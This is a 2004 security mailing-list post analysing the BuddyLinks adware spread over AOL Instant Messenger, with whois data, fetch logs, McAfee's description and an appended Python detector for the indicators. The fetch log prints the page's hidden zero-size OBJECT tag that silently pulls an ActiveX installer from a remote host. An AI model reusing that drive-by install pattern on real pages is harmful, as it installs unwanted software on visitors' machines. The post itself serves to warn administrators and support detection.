[DShield] AOL IM auto-sending BuddyLinks OCX

Erik van Straten emvs.dsh.3FB4CC72 at cpo.tn.tudelft.nl
Wed Feb 11 13:16:02 GMT 2004


Internap/Exodus Abuse, DShield List,

I fetched the AOL IM auto-sending "BuddyLinks" OCX (ActiveX component).
I am not saying that this is a virus, although there seem to be some
similarities. The manufacturer denies this, as shown below. Meanwhile
McAfee recognizes it as an adware product (URL at the end of this mail).

I'm sending this message because possibly the sites mentioned below are
in violation of their providers' AUPs, and to the list, in order to
warn admins that this product may initiate undesired connections, and
perhaps generate excessive network traffic; also installation of such
software may be considered a compromise in security, in particular on
corporate PCs.

From http://www.buddylinks.net/ (20040211 1330 +0100):
> Welcome to Buddylinks.net!
> February 10, 2004 
>
> We are proud to announce our latest release, The WGUTV Osama Game, "Run
> Saddam Run"! Help President Bush trick Osama and Saddam into working for
> the USA!
>
> Our game has grown so fast that we have received some emails and phone
> calls asking about the nature of our flash games. Our games interact
> with instant messengers by promoting the game among the user's network
> of buddies. Please understand, our flash games are in no way a virus. We
> simply combine peer-to-peer, social networking, and instant messaging
> into one spectacular technology.
[snip]
> 1 Get BuddyLinks
> install BuddyLinks in your Instant Messenger
>
> 2 Send Friends funny news
> Soon your Instant Messenger will begin sending your friends funny
> news messages like this
>
> 3 Open the prize
> Your friends will love the prize they receive in their funny news
> message. It might be a game or a funny flash cartoon.
[snip]

I may be mistaken, but this doesn't seem like decent Internet behavior
(especially youngsters may unintentionally hit the wrong button), and it
may be in violation of Internap's and/or Exodus' AUPs.

**Possibly** the following site is compromised:
------------------------------------------
wgutv.com [63.251.131.235]
Internap Network Services NETBLK-PNAP-11-99 (NET-63-251-0-0-1) 
                                  63.251.0.0 - 63.251.255.255
ClickSpring LLC INAP-BSN-CLICKSPRING-0041 (NET-63-251-131-232-1) 
                                  63.251.131.232 - 63.251.131.239
TechName:   InterNap Network Operations Center 
OrgAbuseEmail:  abuse.internap.com
------------------------------------------

The following site(s) owner(s) **may have** other intentions than
advertised:

------------------------------------------
download.buddylinks.net [212.62.17.142], [212.62.17.143]
inetnum:      212.62.17.128 - 212.62.17.191
netname:      SPEEDERA
nic-hdl:      CLAU1-RIPE
remarks:      To report email/network abuses, please send email to
              abuse.exodus.net.
------------------------------------------

Please find a detailed analysis below.

Regards,
Erik van Straten



Detailed analysis:
------------------------------------------
02/11/04 12:26:48 Browsing http://www.wgutv.com/osama_capture.php?lmpZ
Fetching http://www.wgutv.com/osama_capture.php?lmpZ ...
GET /osama_capture.php?lmpZ HTTP/1.1
Host: www.wgutv.com
Connection: close

HTTP/1.1 200 HTTP
Content-Type: text/html
X-Powered-By: PHP/4.3.4
X-Accelerated-By: PHPA/1.3.3r2
Connection: close

[Snip]
  <title>Osama Captured Shortly After Saddam Found</title>
[Snip]
  <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 
    CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
    CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">
</OBJECT>
[Snip]

> wget.exe http://download.buddylinks.net/ShellInstaller.cab
--12:27:53--  http://download.buddylinks.net/ShellInstaller.cab
           => `ShellInstaller.cab'
Resolving download.buddylinks.net... 212.62.17.143, 213.41.76.73
Connecting to download.buddylinks.net[212.62.17.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46,988 [text/plain]

100%[====================================>] 46,988        --.--K/s

12:27:54 (573.58 KB/s) - `ShellInstaller.cab' saved [46988/46988]

Extracted contents of:
02/10/04  07:47p                46,988 ShellInstaller.cab

Results in 2 files:
12/15/03  02:08p                 2,119 ShellInstaller.INF
02/10/04  12:21p                81,920 ShellInstaller.ocx

------------------------------------------
02/11/04 12:34:14 Browsing http://www.wgutv.com/terms.html
Fetching http://www.wgutv.com/terms.html ...
GET /terms.html HTTP/1.1
Host: www.wgutv.com
Connection: close

HTTP/1.1 200 HTTP
Server: thttpd/2.21b PHP/20030920
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 11 Feb 2004 11:42:05 GMT
Last-Modified: Wed, 11 Feb 2004 11:04:23 GMT
Accept-Ranges: bytes
Content-Length: 27634
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>[NAME]</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR>

[Snip/Ed. note: the following line may not belong on this page:]

<P><B>Note: This is not an actual news story. This is the prologue to a Flash video game.</B></P>

<P class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center" 
align=center><B><SPAN style="COLOR: black">PSD TOOLS</SPAN></B></P>
<P class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center" 
align=center><B><SPAN style="COLOR: black">END USER AGREEMENT AND SOFTWARE 
LICENSE TERMS</SPAN></B></P>

[Snip]
------------------------------------------

References:

On the Intrusions mailing list, on Tue, 10 Feb 2004 19:00:16 -0500 (EST),
Phillip G Deneault of wpi.edu points out that a new kind of virus is
spreading among AOL IM users:
http://cert.uni-stuttgart.de/archive/intrusions/2004/02/msg00062.html
> A student reported that this link was sent to her via AOL Instant
> Messenger:
>
> http://www.wgutv.com/osama_capture.php?lmpZ
>
> A LOT of systems on campus are currently trying to connect to it from my
> Class-B and I cannot connect to anything on the IP address that this URL
> is resolving to (currently 63.251.131.235).
>
> I'm not sure if this is a new virus, but it sure seems like one... or else
> someone really did capture Osama. :-)
>
> Phil

There was a response from Nick Fitzgerald:
http://cert.uni-stuttgart.de/archive/intrusions/2004/02/msg00063.html

Also mentioned here: http://isc.sans.org/diary.html?date=2004-02-10

Part of Network Associates McAfee antivirus description:
http://vil.nai.com/vil/content/v_101007.htm
> SubType:  Adware
> Description Modified:  02/10/2004 9:27 PM (PT)
>
> This is not a virus or trojan. It is a potentially unwanted program
> that requires users to download an installer, agreeing to the terms of
> the program, which includes sending messages to all users on your AOL
> Instant Messenger buddy list with a link to the installer page.
>
> This application works when visiting the www.wgutv.com or
> download.buddylinks.net websites. A link to these sites arrives in an
> instant message. Once this page has loaded, users are prompted to
> install and run a program.
[snip]
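For admins who want to act on the analysis above, here is an added example (not part of the original message) that turns its indicators into two checks: one that spots an OBJECT tag pulling an ActiveX .cab from a foreign host, as the wgutv.com page does with the BuddyLinks CLSID, and one that counts internal clients hitting the quoted hostnames in proxy logs. The hostnames, CLSID and CAB name are taken from the message; the HTML fragment and the log lines are constructed samples.

```python
"""Flag the BuddyLinks indicators quoted in the message above (added example;
the hostnames, CLSID and CAB name come from the post, the samples are constructed)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

KNOWN_HOSTS = {"www.wgutv.com", "download.buddylinks.net"}  # from the post
KNOWN_CLSID = "FDDCE9FF-1FC6-413C-80B1-37B101FDA1D4"        # from the post
OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.I)            # opening tag + attrs
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')

def find_remote_installers(html, page_host):
    """Return (clsid, cab_url, matches_known_clsid) for every OBJECT whose
    CODEBASE pulls a .cab from another host: the drive-by ActiveX install."""
    hits = []
    for m in OBJECT_RE.finditer(html):
        attrs = {a.group(1).lower(): a.group(2) or a.group(3) or a.group(4) or ""
                 for a in ATTR_RE.finditer(m.group(1))}
        cab_url = attrs.get("codebase", "").split("#", 1)[0]  # drop "#Version=..."
        host = urlsplit(cab_url).hostname or page_host        # relative => same host
        clsid = attrs.get("classid", "").upper().replace("CLSID:", "")
        if cab_url.lower().endswith(".cab") and host != page_host:
            hits.append((clsid, cab_url, clsid == KNOWN_CLSID))
    return hits

def clients_hitting_indicators(log_lines):
    """Count requests per client to the known hosts or the CAB, from proxy lines
    shaped 'time client method url', to see how many machines reach the site."""
    counts = defaultdict(int)
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        if urlsplit(url).hostname in KNOWN_HOSTS or url.lower().endswith("/shellinstaller.cab"):
            counts[client] += 1
    return dict(counts)

SAMPLE_HTML = """<title>Osama Captured Shortly After Saddam Found</title>
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
    CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
    CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">
</OBJECT>"""
SAMPLE_LOG = [  # constructed proxy lines: time client method url
    "12:26:48 10.0.5.17 GET http://www.wgutv.com/osama_capture.php?lmpZ",
    "12:26:49 10.0.5.17 GET http://download.buddylinks.net/ShellInstaller.cab",
    "12:27:02 10.0.5.23 GET http://www.wgutv.com/osama_capture.php?lmpZ",
    "12:27:10 10.0.5.40 GET http://www.example.com/index.html",
]
```

Running `find_remote_installers(SAMPLE_HTML, "www.wgutv.com")` returns the single BuddyLinks OBJECT with its CLSID matched, and `clients_hitting_indicators(SAMPLE_LOG)` returns two affected clients.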
